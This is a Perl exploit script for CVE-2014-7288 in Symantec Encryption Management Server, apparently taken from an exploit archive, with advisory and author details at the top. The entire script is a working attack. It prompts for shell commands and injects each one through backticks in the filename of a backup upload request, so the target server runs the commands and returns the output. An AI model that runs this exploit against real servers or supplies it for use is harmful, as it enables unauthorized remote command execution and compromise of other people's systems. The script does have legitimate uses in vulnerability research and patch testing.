#!/usr/bin/perl -w
use LWP::UserAgent;
# Vantage Point Security Advisory 2014-007
# Title: Symantec Encryption Management Server - Remote Command
Injection Exploit
# CVE: CVE-2014-7288
# Vendor: Symantec
# Affected Product: Symantec Encryption Gateway
# Affected Versions: < 3.2.0 MP6
# Product Website:
http://www.symantec.com/en/sg/gateway-email-encryption/
# Exploit Info : https://www.exploit-db.com/exploits/35949/
# Author: Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
if (($#ARGV + 1) != 1)
{
printf " Usage: \n \t$0 <Target>\n";
printf "\t$0 http://target.com/\n\n";
exit(1);
}
chomp($target=$ARGV[0]);
if($target !~ /http:\/\//) { $target = "http://$target"; }
my $ua = LWP::UserAgent->new;
$ua->timeout(10);
my $url = "$target/omc/uploadBackup.event";
for(;;)
{
print "shell : ";
chomp($cmd=<STDIN>);
my $response = $ua->post( $url,
Content_Type => 'form-data',
name => "file",
Content => [ filename => "test123|`$cmd`|-whatever.tar.gz.pgp" ]
);
print "\n".$response->content;
}
